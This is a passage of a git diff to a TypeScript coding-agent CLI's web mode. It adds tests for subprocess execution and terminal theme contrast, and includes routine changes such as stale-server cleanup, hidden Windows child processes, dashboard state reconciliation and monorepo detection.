@@ -0,0 +1,177 @@
+import test from "node:test"
+import assert from "node:assert/strict"
+
+const { runSubprocess, resolveModulePaths } = await import("../web/subprocess-runner.ts")
+
+// ---------------------------------------------------------------------------
+// resolveModulePaths — centralised TS loader + module path resolution
+// ---------------------------------------------------------------------------
+
+test("resolveModulePaths returns tsLoaderPath and validates it exists", () => {
+  const packageRoot = "/fake/package"
+  const result = resolveModulePaths(packageRoot, {
+    modules: [{ envKey: "MOD", relativePath: "src/mod.ts" }],
+    existsSync: () => true,
+  })
+  assert.equal(
+    result.tsLoaderPath,
+    "/fake/package/src/resources/extensions/gsd/tests/resolve-ts.mjs",
+  )
+})
+
+test("resolveModulePaths throws when TS loader is missing", () => {
+  const packageRoot = "/fake/package"
+  assert.throws(
+    () =>
+      resolveModulePaths(packageRoot, {
+        modules: [{ envKey: "MOD", relativePath: "src/mod.ts" }],
+        existsSync: () => false,
+        label: "test-service",
+      }),
+    (error: Error) => {
+      assert.match(error.message, /test-service/)
+      assert.match(error.message, /not found/)
+      return true
+    },
+  )
+})
+
+test("resolveModulePaths throws when any module path is missing", () => {
+  const packageRoot = "/fake/package"
+  const existingSets = new Set([
+    "/fake/package/src/resources/extensions/gsd/tests/resolve-ts.mjs",
+  ])
+  assert.throws(
+    () =>
+      resolveModulePaths(packageRoot, {
+        modules: [
+          { envKey: "MOD_A", relativePath: "src/a.ts" },
+          { envKey: "MOD_B", relativePath: "src/b.ts" },
+        ],
+        existsSync: (p: string) => existingSets.has(p),
+        label: "multi-mod",
+      }),
+    (error: Error) => {
+      assert.match(error.message, /multi-mod/)
+      return true
+    },
+  )
+})
+
+test("resolveModulePaths returns env entries for each module", () => {
+  const packageRoot = "/fake/package"
+  const result = resolveModulePaths(packageRoot, {
+    modules: [
+      { envKey: "GSD_MOD_A", relativePath: "src/a.ts" },
+      { envKey: "GSD_MOD_B", relativePath: "src/b.ts" },
+    ],
+    existsSync: () => true,
+  })
+  assert.deepEqual(result.env, {
+    GSD_MOD_A: "/fake/package/src/a.ts",
+    GSD_MOD_B: "/fake/package/src/b.ts",
+  })
+})
+
+// ---------------------------------------------------------------------------
+// runSubprocess — shared execFile + JSON.parse wrapper
+// ---------------------------------------------------------------------------
+
+test("runSubprocess returns parsed JSON from a child process", async () => {
+  const result = await runSubprocess<{ hello: string }>({
+    packageRoot: process.cwd(),
+    script: 'process.stdout.write(JSON.stringify({ hello: "world" }));',
+    env: {},
+    label: "test",
+  })
+  assert.deepEqual(result, { hello: "world" })
+})
+
+test("runSubprocess rejects when child process exits with error", async () => {
+  await assert.rejects(
+    () =>
+      runSubprocess({
+        packageRoot: process.cwd(),
+        script: 'process.exit(1);',
+        env: {},
+        label: "exit-test",
+      }),
+    (error: Error) => {
+      assert.match(error.message, /exit-test/)
+      assert.match(error.message, /subprocess failed/)
+      return true
+    },
+  )
+})
+
+test("runSubprocess rejects on invalid JSON output", async () => {
+  await assert.rejects(
+    () =>
+      runSubprocess({
+        packageRoot: process.cwd(),
+        script: 'process.stdout.write("not json");',
+        env: {},
+        label: "json-test",
+      }),
+    (error: Error) => {
+      assert.match(error.message, /json-test/)
+      assert.match(error.message, /invalid JSON/)
+      return true
+    },
+  )
+})
+
+test("runSubprocess applies timeout option", async () => {
+  await assert.rejects(
+    () =>
+      runSubprocess({
+        packageRoot: process.cwd(),
+        script: 'setTimeout(() => {}, 60000);',
+        env: {},
+        label: "timeout-test",
+        timeoutMs: 500,
+      }),
+    (error: Error) => {
+      assert.match(error.message, /timeout-test/)
+      return true
+    },
+  )
+})
+
+test("runSubprocess accepts custom maxBuffer", async () => {
+  // Verify it does not throw with a reasonable buffer
+  const result = await runSubprocess<{ ok: boolean }>({
+    packageRoot: process.cwd(),
+    script: 'process.stdout.write(JSON.stringify({ ok: true }));',
+    env: {},
+    label: "buffer-test",
+    maxBuffer: 512,
+  })
+  assert.equal(result.ok, true)
+})
+
+test("runSubprocess passes env vars to child process", async () => {
+  const result = await runSubprocess<{ val: string }>({
+    packageRoot: process.cwd(),
+    script: 'process.stdout.write(JSON.stringify({ val: process.env.TEST_VAR }));',
+    env: { TEST_VAR: "hello_from_parent" },
+    label: "env-test",
+  })
+  assert.equal(result.val, "hello_from_parent")
+})
+
+test("runSubprocess includes stderr in error message on failure", async () => {
+  await assert.rejects(
+    () =>
+      runSubprocess({
+        packageRoot: process.cwd(),
+        script: 'process.stderr.write("detailed error info"); process.exit(1);',
+        env: {},
+        label: "stderr-test",
+      }),
+    (error: Error) => {
+      assert.match(error.message, /detailed error info/)
+      return true
+    },
+  )
+})
diff --git a/src/tests/welcome-screen.test.ts b/src/tests/welcome-screen.test.ts
index 347f4fda9..dcc7f8105 100644
--- a/src/tests/welcome-screen.test.ts
+++ b/src/tests/welcome-screen.test.ts
@@ -51,23 +51,50 @@ test('renders cwd hint', () => {
   assert.ok(out.includes('/gsd to begin'), 'hint line missing')
 })
 
-test('skips when not a TTY', () => {
+test('skips when not a TTY', (t) => {
   const chunks: string[] = []
   const original = process.stderr.write.bind(process.stderr)
   ;(process.stderr as any).write = (chunk: string) => { chunks.push(chunk); return true }
   const origIsTTY = (process.stderr as any).isTTY
   ;(process.stderr as any).isTTY = false
 
-  try {
-    printWelcomeScreen({ version: '1.0.0' })
-    assert.equal(chunks.join(''), '', 'should produce no output when not TTY')
-  } finally {
+  t.after(() => {
     ;(process.stderr as any).write = original
     ;(process.stderr as any).isTTY = origIsTTY
-  }
+  });
+
+  printWelcomeScreen({ version: '1.0.0' })
+  assert.equal(chunks.join(''), '', 'should produce no output when not TTY')
 })
 
 test('renders without model or provider', () => {
   const out = strip(capture({ version: '3.0.0' }))
   assert.ok(out.includes('v3.0.0'), 'version missing when no model provided')
 })
+
+test('renders remote channel in tools row', () => {
+  const out = strip(capture({ version: '1.0.0', remoteChannel: 'discord' }))
+  assert.ok(out.includes('Discord'), 'remote channel name missing')
+})
+
+test('omits remote channel when not provided', () => {
+  const out = strip(capture({ version: '1.0.0' }))
+  assert.ok(!out.includes('Discord'), 'should not show Discord when no remote')
+  assert.ok(!out.includes('Slack'), 'should not show Slack when no remote')
+  assert.ok(!out.includes('Telegram'), 'should not show Telegram when no remote')
+})
+
+test('separator lines extend to full terminal width on wide terminals', (t) => {
+  const origColumns = process.stderr.columns
+  ;(process.stderr as any).columns = 250
+  t.after(() => { ;(process.stderr as any).columns = origColumns })
+
+  const out = strip(capture({ version: '1.0.0' }))
+  const lines = out.split('\n')
+  // Top and bottom separator bars should be 249 chars (columns - 1)
+  const separatorLines = lines.filter(l => /^─+$/.test(l.trim()))
+  assert.ok(separatorLines.length >= 2, 'expected at least 2 full-width separator lines')
+  for (const sep of separatorLines) {
+    assert.equal(sep.trim().length, 249, `separator should be 249 chars wide, got ${sep.trim().length}`)
+  }
+})
diff --git a/src/tests/xterm-theme.test.ts b/src/tests/xterm-theme.test.ts
new file mode 100644
index 000000000..b3f419be3
--- /dev/null
+++ b/src/tests/xterm-theme.test.ts
@@ -0,0 +1,57 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { resolve } from "node:path";
+
+const { getXtermTheme } = await import("../../web/lib/xterm-theme.ts");
+
+function hexToRgb(hex: string): [number, number, number] {
+  const normalized = hex.replace("#", "");
+  const value = normalized.length === 3
+    ? normalized.split("").map((char) => char + char).join("")
+    : normalized;
+  const int = Number.parseInt(value, 16);
+  return [(int >> 16) & 255, (int >> 8) & 255, int & 255];
+}
+
+function srgbToLinear(channel: number): number {
+  const normalized = channel / 255;
+  return normalized <= 0.04045
+    ? normalized / 12.92
+    : ((normalized + 0.055) / 1.055) ** 2.4;
+}
+
+function contrastRatio(foreground: string, background: string): number {
+  const luminance = (hex: string) => {
+    const [r, g, b] = hexToRgb(hex).map(srgbToLinear);
+    return 0.2126 * r + 0.7152 * g + 0.0722 * b;
+  };
+  const [lighter, darker] = [luminance(foreground), luminance(background)].sort((a, b) => b - a);
+  return (lighter + 0.05) / (darker + 0.05);
+}
+
+test("light xterm palette keeps warning and ANSI white entries readable", () => {
+  const theme = getXtermTheme(false);
+
+  assert.ok(contrastRatio(theme.foreground, theme.background) >= 14, "foreground should remain highly legible");
+  assert.ok(contrastRatio(theme.yellow, theme.background) >= 4.5, "yellow should meet readable contrast");
+  assert.ok(contrastRatio(theme.brightYellow, theme.background) >= 4.5, "bright yellow should meet readable contrast");
+  assert.ok(contrastRatio(theme.white, theme.background) >= 4.5, "white should stay readable on light background");
+  assert.ok(contrastRatio(theme.brightWhite, theme.background) >= 4.5, "bright white should stay readable on light background");
+});
+
+test("terminal components share the central xterm theme helper", () => {
+  const shellSource = readFileSync(
+    resolve(import.meta.dirname, "../../web/components/gsd/shell-terminal.tsx"),
+    "utf8",
+  );
+  const mainSource = readFileSync(
+    resolve(import.meta.dirname, "../../web/components/gsd/main-session-terminal.tsx"),
+    "utf8",
+  );
+
+  assert.match(shellSource, /from \"@\/lib\/xterm-theme\"/);
+  assert.match(mainSource, /from \"@\/lib\/xterm-theme\"/);
+  assert.doesNotMatch(shellSource, /const XTERM_LIGHT_THEME =/);
+  assert.doesNotMatch(mainSource, /const XTERM_LIGHT_THEME =/);
+});
diff --git a/src/update-cmd.ts b/src/update-cmd.ts
index ac16a8209..9534fd9f6 100644
--- a/src/update-cmd.ts
+++ b/src/update-cmd.ts
@@ -14,18 +14,21 @@ export async function runUpdate(): Promise<void> {
   process.stdout.write(`${dim}Current version:${reset} v${current}\n`)
   process.stdout.write(`${dim}Checking npm registry...${reset}\n`)
 
-  // Fetch latest version
+  // Fetch latest version — bypass npm client cache to avoid stale results (#3445)
   let latest: string
   try {
-    latest = execSync(`npm view ${NPM_PACKAGE} version`, {
+    latest = execSync(`npm view ${NPM_PACKAGE} version --fetch-retry-mintimeout=3000`, {
       encoding: 'utf-8',
       stdio: ['ignore', 'pipe', 'ignore'],
+      env: { ...process.env, npm_config_cache: '' },
     }).trim()
   } catch {
     process.stderr.write(`${yellow}Failed to reach npm registry.${reset}\n`)
     process.exit(1)
   }
 
+  process.stdout.write(`${dim}Latest version:${reset}  v${latest}\n`)
+
   if (compareSemver(latest, current) <= 0) {
     process.stdout.write(`${green}Already up to date.${reset}\n`)
     return
diff --git a/src/web-mode.ts b/src/web-mode.ts
index 2f6b3e2ad..665e0f5a8 100644
--- a/src/web-mode.ts
+++ b/src/web-mode.ts
@@ -14,7 +14,7 @@ const DEFAULT_PACKAGE_ROOT = resolve(dirname(fileURLToPath(import.meta.url)), '.
 function openBrowser(url: string): void {
   if (process.platform === 'win32') {
     // PowerShell's Start-Process handles URLs with '&' safely; cmd /c start does not.
-    execFile('powershell', ['-c', `Start-Process '${url.replace(/'/g, "''")}'`], () => {})
+    execFile('powershell', ['-c', `Start-Process '${url.replace(/'/g, "''")}'`], { windowsHide: true }, () => {})
   } else {
     const cmd = process.platform === 'darwin' ? 'open' : 'xdg-open'
     execFile(cmd, [url], () => {})
@@ -102,6 +102,8 @@ export interface WebModeDeps {
   writePidFile?: (path: string, pid: number) => void
   readPidFile?: (path: string) => number | null
   deletePidFile?: (path: string) => void
+  /** Path to the multi-instance registry JSON (for testing). */
+  registryPath?: string
 }
 
 export interface WebModeStopResult {
@@ -514,6 +516,30 @@ async function waitForBootReady(url: string, timeoutMs = 180_000, stderr?: Writa
   throw new Error(lastError ?? 'timed out waiting for boot readiness')
 }
 
+/**
+ * If a previous web server instance is registered for the same `cwd`, attempt
+ * to kill it and remove its registry entry so the new launch can bind the port
+ * cleanly.  This handles the "orphan process" scenario where a prior `gsd --web`
+ * was terminated without clean shutdown (e.g. terminal closed).
+ */
+function cleanupStaleInstance(cwd: string, stderr: WritableLike, registryPath?: string): void {
+  const registry = readInstanceRegistry(registryPath)
+  const key = resolve(cwd)
+  const stale = registry[key]
+  if (!stale) return
+
+  stderr.write(`[gsd] Cleaning up stale web server for ${key} (pid=${stale.pid}, port=${stale.port})…\n`)
+  const result = killPid(stale.pid)
+  if (result === 'killed') {
+    stderr.write(`[gsd] Killed stale web server (pid=${stale.pid}).\n`)
+  } else if (result === 'already-dead') {
+    stderr.write(`[gsd] Stale web server was already stopped (pid=${stale.pid}) — clearing entry.\n`)
+  } else {
+    stderr.write(`[gsd] Could not kill stale web server (pid=${stale.pid}): ${result.error}\n`)
+  }
+  unregisterInstance(cwd, registryPath)
+}
+
 export async function launchWebMode(
   options: WebModeLaunchOptions,
   deps: WebModeDeps = {},
@@ -546,6 +572,11 @@ export async function launchWebMode(
 
   stderr.write(`[gsd] Starting web mode…\n`)
 
+  // Kill any stale server instance for this project before reserving a port.
+  // This prevents EADDRINUSE when the previous `gsd --web` was terminated
+  // without a clean shutdown (e.g. terminal closed, crash).
+  cleanupStaleInstance(options.cwd, stderr, deps.registryPath)
+
   const port = options.port ?? await (deps.resolvePort ?? reserveWebPort)(host)
   const authToken = randomBytes(32).toString('hex')
   const url = `http://${host}:${port}`
@@ -604,6 +635,7 @@ export async function launchWebMode(
       cwd: spawnSpec.cwd,
       detached: true,
       stdio: 'ignore',
+      windowsHide: true,
       env,
     },
   )
@@ -654,9 +686,14 @@ export async function launchWebMode(
       const pidFilePath = deps.pidFilePath ?? defaultWebPidFilePath
       ;(deps.writePidFile ?? writePidFile)(pidFilePath, pid)
       // Register in multi-instance registry
-      registerInstance(options.cwd, { pid, port, url })
+      registerInstance(options.cwd, { pid, port, url }, deps.registryPath)
+    }
+    const authenticatedUrl = `${url}/#token=${authToken}`
+    try {
+      ;(deps.openBrowser ?? openBrowser)(authenticatedUrl)
+    } catch (browserError) {
+      stderr.write(`[gsd] Could not open browser: ${browserError instanceof Error ? browserError.message : String(browserError)}\n`)
     }
-    ;(deps.openBrowser ?? openBrowser)(`${url}/#token=${authToken}`)
   } catch (error) {
     const failure: WebModeLaunchFailure = {
       mode: 'web',
@@ -675,6 +712,7 @@ export async function launchWebMode(
     return failure
   }
 
+  const authenticatedUrl = `${url}/#token=${authToken}`
   const success: WebModeLaunchSuccess = {
     mode: 'web',
     ok: true,
@@ -687,7 +725,7 @@ export async function launchWebMode(
     hostPath: resolution.entryPath,
     hostRoot: resolution.hostRoot,
   }
-  stderr.write(`[gsd] Ready → ${url}\n`)
+  stderr.write(`[gsd] Ready → ${authenticatedUrl}\n`)
   emitLaunchStatus(stderr, success)
   return success
 }
diff --git a/src/web/auto-dashboard-service.ts b/src/web/auto-dashboard-service.ts
index fdce2c0c9..972c7474f 100644
--- a/src/web/auto-dashboard-service.ts
+++ b/src/web/auto-dashboard-service.ts
@@ -1,10 +1,10 @@
 import { execFile } from "node:child_process";
-import { existsSync } from "node:fs";
+import { existsSync, readFileSync } from "node:fs";
 import { join } from "node:path";
 import { pathToFileURL } from "node:url";
 
 import type { AutoDashboardData } from "./bridge-service.ts";
-import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts"
+import { resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts";
 
 const AUTO_DASHBOARD_MAX_BUFFER = 1024 * 1024;
 const TEST_AUTO_DASHBOARD_MODULE_ENV = "GSD_WEB_TEST_AUTO_DASHBOARD_MODULE";
@@ -29,13 +29,11 @@ function fallbackAutoDashboardData(): AutoDashboardData {
     basePath: "",
     totalCost: 0,
     totalTokens: 0,
+    rtkSavings: null,
+    rtkEnabled: false,
   };
 }
 
-function resolveAutoDashboardModulePath(packageRoot: string, env: NodeJS.ProcessEnv): string {
-  return env[TEST_AUTO_DASHBOARD_MODULE_ENV] || join(packageRoot, "src", "resources", "extensions", "gsd", "auto.ts");
-}
-
 function resolveTsLoaderPath(packageRoot: string): string {
   return join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs");
 }
@@ -44,6 +42,64 @@ export function collectTestOnlyFallbackAutoDashboardData(): AutoDashboardData {
   return fallbackAutoDashboardData();
 }
 
+/**
+ * Check if a PID is alive by sending signal 0.
+ */
+function isPidAlive(pid: number): boolean {
+  try {
+    process.kill(pid, 0);
+    return true;
+  } catch {
+    return false;
+  }
+}
+
+/**
+ * Reconcile subprocess auto dashboard data with on-disk session state.
+ *
+ * The subprocess always starts with fresh module state (s.active === false),
+ * so it can never report active/paused correctly. We check:
+ *   1. .gsd/auto.lock — if present and its PID is alive, auto IS running.
+ *   2. .gsd/runtime/paused-session.json — if present, auto IS paused.
+ *
+ * See #2705.
+ */
+function reconcileWithDiskState(
+  data: AutoDashboardData,
+  projectCwd: string,
+  checkExists: (path: string) => boolean,
+): AutoDashboardData {
+  // If the subprocess already reports active or paused, trust it.
+  if (data.active || data.paused) return data;
+
+  // Check for paused-session.json first (paused takes precedence).
+  const pausedPath = join(projectCwd, ".gsd", "runtime", "paused-session.json");
+  if (checkExists(pausedPath)) {
+    try {
+      // Validate the file is readable JSON (not corrupt).
+      JSON.parse(readFileSync(pausedPath, "utf-8"));
+      return { ...data, paused: true };
+    } catch {
+      // Corrupt or unreadable — ignore.
+    }
+  }
+
+  // Check for session lock with a live PID.
+  const lockPath = join(projectCwd, ".gsd", "auto.lock");
+  if (checkExists(lockPath)) {
+    try {
+      const lockData = JSON.parse(readFileSync(lockPath, "utf-8")) as { pid?: number };
+      if (typeof lockData.pid === "number" && isPidAlive(lockData.pid)) {
+        return { ...data, active: true };
+      }
+    } catch {
+      // Corrupt or unreadable — ignore.
+    }
+  }
+
+  return data;
+}
+
 export async function collectAuthoritativeAutoDashboardData(
   packageRoot: string,
   options: AutoDashboardServiceOptions = {},
@@ -55,11 +111,19 @@ export async function collectAuthoritativeAutoDashboardData(
 
   const checkExists = options.existsSync ?? existsSync;
   const resolveTsLoader = resolveTsLoaderPath(packageRoot);
-  const autoModulePath = resolveAutoDashboardModulePath(packageRoot, env);
 
-  if (!checkExists(resolveTsLoader) || !checkExists(autoModulePath)) {
+  const testModulePath = env[TEST_AUTO_DASHBOARD_MODULE_ENV];
+  const moduleResolution = testModulePath
+    ? { modulePath: testModulePath, useCompiledJs: false }
+    : resolveSubprocessModule(packageRoot, "resources/extensions/gsd/auto.ts", checkExists);
+  const autoModulePath = moduleResolution.modulePath;
+
+  if (!moduleResolution.useCompiledJs && (!checkExists(resolveTsLoader) || !checkExists(autoModulePath))) {
     throw new Error(`authoritative auto dashboard provider not found; checked=${resolveTsLoader},${autoModulePath}`);
   }
+  if (moduleResolution.useCompiledJs && !checkExists(autoModulePath)) {
+    throw new Error(`authoritative auto dashboard provider not found; checked=${autoModulePath}`);
+  }
 
   const script = [
     'const { pathToFileURL } = await import("node:url");',
@@ -68,14 +132,17 @@ export async function collectAuthoritativeAutoDashboardData(
     'process.stdout.write(JSON.stringify(result));',
   ].join(" ");
 
+  const prefixArgs = buildSubprocessPrefixArgs(
+    packageRoot,
+    moduleResolution,
+    pathToFileURL(resolveTsLoader).href,
+  );
+
   return await new Promise<AutoDashboardData>((resolveResult, reject) => {
     execFile(
       options.execPath ?? process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -86,6 +153,7 @@ export async function collectAuthoritativeAutoDashboardData(
           [AUTO_DASHBOARD_MODULE_ENV]: autoModulePath,
         },
         maxBuffer: AUTO_DASHBOARD_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
@@ -94,7 +162,12 @@ export async function collectAuthoritativeAutoDashboardData(
         }
 
         try {
-          resolveResult(JSON.parse(stdout) as AutoDashboardData);
+          const parsed = JSON.parse(stdout) as AutoDashboardData;
+          const projectCwd = env.GSD_WEB_PROJECT_CWD || "";
+          const reconciled = projectCwd
+            ? reconcileWithDiskState(parsed, projectCwd, checkExists)
+            : parsed;
+          resolveResult(reconciled);
         } catch (parseError) {
           reject(
             new Error(
diff --git a/src/web/bridge-service.ts b/src/web/bridge-service.ts
index 32ed1048b..b5f87cdce 100644
--- a/src/web/bridge-service.ts
+++ b/src/web/bridge-service.ts
@@ -2,9 +2,10 @@ import { execFile, spawn, type ChildProcess, type SpawnOptions } from "node:chil
 import { existsSync, readdirSync, readFileSync, statSync } from "node:fs";
 import { StringDecoder } from "node:string_decoder";
 import type { Readable } from "node:stream";
-import { join, resolve, dirname } from "node:path";
-import { fileURLToPath, pathToFileURL } from "node:url";
-import { resolveTypeStrippingFlag } from "./ts-subprocess-flags.ts";
+import { join, resolve } from "node:path";
+import { pathToFileURL } from "node:url";
+import { resolveTypeStrippingFlag, resolveSubprocessModule, buildSubprocessPrefixArgs } from "./ts-subprocess-flags.ts";
+import { safePackageRootFromImportUrl } from "./safe-import-meta-resolve.ts";
 
 import type { AgentSessionEvent, SessionStateChangeReason } from "../../packages/pi-coding-agent/src/core/agent-session.ts";
 import type {
@@ -39,7 +40,22 @@ import {
 } from "./auto-dashboard-service.ts";
 import { resolveGsdCliEntry } from "./cli-entry.ts";
 
-const DEFAULT_PACKAGE_ROOT = resolve(dirname(fileURLToPath(import.meta.url)), "../..");
+// The standalone Next.js bundle bakes import.meta.url at build time with the
+// CI runner's absolute path.  On Windows, fileURLToPath() rejects a Linux
+// file:// URL at module load time.  Use a lazy getter so the derivation is
+// deferred to first use (not module load) and falls back to cwd on failure.
+let _defaultPackageRoot: string | undefined;
+function getDefaultPackageRoot(): string {
+  if (_defaultPackageRoot !== undefined) return _defaultPackageRoot;
+  _defaultPackageRoot = safePackageRootFromImportUrl(import.meta.url) ?? process.cwd();
+  return _defaultPackageRoot;
+}
+
+/** @internal — test-only: reset the memoized default package root */
+export function resetDefaultPackageRootForTests(): void {
+  _defaultPackageRoot = undefined;
+}
+
 const RESPONSE_TIMEOUT_MS = 30_000;
 const START_TIMEOUT_MS = 150_000;
 const MAX_STDERR_BUFFER = 8_000;
@@ -374,6 +390,17 @@ function filterAndSortSessions(
   return scored.map((entry) => entry.session);
 }
 
+export interface RtkSessionSavings {
+  commands: number;
+  inputTokens: number;
+  outputTokens: number;
+  savedTokens: number;
+  savingsPct: number;
+  totalTimeMs: number;
+  avgTimeMs: number;
+  updatedAt: string;
+}
+
 export interface AutoDashboardData {
   active: boolean;
   paused: boolean;
@@ -385,6 +412,9 @@ export interface AutoDashboardData {
   basePath: string;
   totalCost: number;
   totalTokens: number;
+  rtkSavings?: RtkSessionSavings | null;
+  /** Whether RTK is enabled via experimental.rtk preference. False when not opted in. */
+  rtkEnabled?: boolean;
 }
 
 export interface BridgeLastError {
@@ -489,6 +519,8 @@ export interface ProjectDetectionSignals {
   hasCargo?: boolean;
   hasGoMod?: boolean;
   hasPyproject?: boolean;
+  /** True when the directory looks like a monorepo root (workspaces, lerna, pnpm-workspace, etc.) */
+  isMonorepo?: boolean;
   fileCount: number;
 }
 
@@ -497,6 +529,46 @@ export interface ProjectDetection {
   signals: ProjectDetectionSignals;
 }
 
+/**
+ * Detect whether a directory looks like a monorepo root.
+ *
+ * Checks for common monorepo indicators:
+ * - `pnpm-workspace.yaml` (pnpm workspaces)
+ * - `lerna.json` (Lerna)
+ * - `package.json` with a `workspaces` field (npm/yarn workspaces)
+ * - `rush.json` (Rush)
+ * - `nx.json` (Nx)
+ * - `turbo.json` (Turborepo)
+ *
+ * This is intentionally cheap — file existence checks only, with a single
+ * JSON parse for `package.json` workspaces (which we're already reading
+ * in many code paths). No deep directory scanning.
+ */
+export function detectMonorepo(dirPath: string, checkExists?: (path: string) => boolean): boolean {
+  const exists = checkExists ?? (getBridgeDeps().existsSync ?? existsSync);
+
+  // Fast checks — file existence only
+  if (exists(join(dirPath, "pnpm-workspace.yaml"))) return true;
+  if (exists(join(dirPath, "lerna.json"))) return true;
+  if (exists(join(dirPath, "rush.json"))) return true;
+  if (exists(join(dirPath, "nx.json"))) return true;
+  if (exists(join(dirPath, "turbo.json"))) return true;
+
+  // Check package.json for workspaces field (npm/yarn workspaces)
+  const packageJsonPath = join(dirPath, "package.json");
+  if (exists(packageJsonPath)) {
+    try {
+      const raw = readFileSync(packageJsonPath, "utf-8");
+      const pkg = JSON.parse(raw) as Record<string, unknown>;
+      if (pkg.workspaces != null) return true;
+    } catch {
+      // Malformed JSON or unreadable — not a monorepo indicator
+    }
+  }
+
+  return false;
+}
+
 export function detectProjectKind(projectCwd: string): ProjectDetection {
   const checkExists = getBridgeDeps().existsSync ?? existsSync;
 
@@ -507,6 +579,7 @@ export function detectProjectKind(projectCwd: string): ProjectDetection {
   const hasCargo = checkExists(join(projectCwd, "Cargo.toml"));
   const hasGoMod = checkExists(join(projectCwd, "go.mod"));
   const hasPyproject = checkExists(join(projectCwd, "pyproject.toml"));
+  const isMonorepo = detectMonorepo(projectCwd, checkExists);
 
   // Count top-level non-dot entries (cheap heuristic for "has code")
   let fileCount = 0;
@@ -525,6 +598,7 @@ export function detectProjectKind(projectCwd: string): ProjectDetection {
     hasCargo,
     hasGoMod,
     hasPyproject,
+    isMonorepo,
     fileCount,
   };
 
@@ -578,6 +652,7 @@ export type BridgeLiveStateDomain = "auto" | "workspace" | "recovery" | "resumab
 export type BridgeLiveStateInvalidationSource = "bridge_event" | "rpc_command" | "session_manage";
 export type BridgeLiveStateInvalidationReason =
   | "agent_end"
+  | "turn_end"
   | "auto_retry_start"
   | "auto_retry_end"
   | "auto_compaction_start"
@@ -690,6 +765,7 @@ async function loadSessionBrowserSessionsViaChildProcess(config: BridgeRuntimeCo
           GSD_SESSION_BROWSER_DIR: config.projectSessionsDir,
         },
         maxBuffer: 1024 * 1024,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
@@ -751,6 +827,7 @@ async function appendSessionInfoViaChildProcess(
           GSD_TARGET_SESSION_NAME: name,
         },
         maxBuffer: 1024 * 1024,
+        windowsHide: true,
       },
       (error, _stdout, stderr) => {
         if (error) {
@@ -905,12 +982,20 @@ async function loadCachedWorkspaceIndex(
 
 async function loadWorkspaceIndexViaChildProcess(basePath: string, packageRoot: string): Promise<GSDWorkspaceIndex> {
   const deps = getBridgeDeps();
-  const resolveTsLoader = join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs");
-  const workspaceModulePath = join(packageRoot, "src", "resources", "extensions", "gsd", "workspace-index.ts");
   const checkExists = deps.existsSync ?? existsSync;
-  if (!checkExists(resolveTsLoader) || !checkExists(workspaceModulePath)) {
+  const resolveTsLoader = join(packageRoot, "src", "resources", "extensions", "gsd", "tests", "resolve-ts.mjs");
+  const moduleResolution = resolveSubprocessModule(
+    packageRoot,
+    "resources/extensions/gsd/workspace-index.ts",
+    checkExists,
+  );
+  const workspaceModulePath = moduleResolution.modulePath;
+  if (!moduleResolution.useCompiledJs && (!checkExists(resolveTsLoader) || !checkExists(workspaceModulePath))) {
     throw new Error(`workspace index loader not found; checked=${resolveTsLoader},${workspaceModulePath}`);
   }
+  if (moduleResolution.useCompiledJs && !checkExists(workspaceModulePath)) {
+    throw new Error(`workspace index module not found; checked=${workspaceModulePath}`);
+  }
 
   const script = [
     'const { pathToFileURL } = await import("node:url");',
@@ -919,14 +1004,17 @@ async function loadWorkspaceIndexViaChildProcess(basePath: string, packageRoot:
     'process.stdout.write(JSON.stringify(result));',
   ].join(' ');
 
+  const prefixArgs = buildSubprocessPrefixArgs(
+    packageRoot,
+    moduleResolution,
+    pathToFileURL(resolveTsLoader).href,
+  );
+
   return await new Promise<GSDWorkspaceIndex>((resolveResult, reject) => {
     execFile(
       deps.execPath ?? process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -938,6 +1026,7 @@ async function loadWorkspaceIndexViaChildProcess(basePath: string, packageRoot:
           GSD_WORKSPACE_BASE: basePath,
         },
         maxBuffer: 1024 * 1024,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
@@ -1047,7 +1136,7 @@ async function fallbackWorkspaceIndex(basePath: string): Promise<GSDWorkspaceInd
 export function resolveBridgeRuntimeConfig(env: NodeJS.ProcessEnv = getBridgeDeps().env ?? process.env, projectCwdOverride?: string): BridgeRuntimeConfig {
   const projectCwd = projectCwdOverride || env.GSD_WEB_PROJECT_CWD || process.cwd();
   const projectSessionsDir = env.GSD_WEB_PROJECT_SESSIONS_DIR || getProjectSessionsDir(projectCwd);
-  const packageRoot = env.GSD_WEB_PACKAGE_ROOT || DEFAULT_PACKAGE_ROOT;
+  const packageRoot = env.GSD_WEB_PACKAGE_ROOT || getDefaultPackageRoot();
   return { projectCwd, projectSessionsDir, packageRoot };
 }
 
@@ -1159,6 +1248,13 @@ function createLiveStateInvalidationFromBridgeEvent(
         domains: ["auto", "workspace", "recovery"],
         workspaceIndexCacheInvalidated: true,
       };
+    case "turn_end":
+      return {
+        reason: "turn_end",
+        source: "bridge_event",
+        domains: ["workspace"],
+        workspaceIndexCacheInvalidated: true,
+      };
     case "auto_retry_start":
       return {
         reason: "auto_retry_start",
@@ -1524,6 +1620,7 @@ export class BridgeService {
       cwd: cliEntry.cwd,
       env: childEnv,
       stdio: ["pipe", "pipe", "pipe"],
+      windowsHide: true,
     }) as SpawnedRpcChild;
 
     this.process = child;
@@ -1679,6 +1776,7 @@ export class BridgeService {
       const eventType = (event as { type?: string }).type;
       if (
         eventType === "agent_end" ||
+        eventType === "turn_end" ||
         eventType === "auto_retry_start" ||
         eventType === "auto_retry_end" ||
         eventType === "auto_compaction_start" ||
diff --git a/src/web/captures-service.ts b/src/web/captures-service.ts
index 938cdf396..2a8b4c9b8 100644
--- a/src/web/captures-service.ts
+++ b/src/web/captures-service.ts
@@ -4,16 +4,12 @@ import { join } from "node:path"
 import { pathToFileURL } from "node:url"
 
 import { resolveBridgeRuntimeConfig } from "./bridge-service.ts"
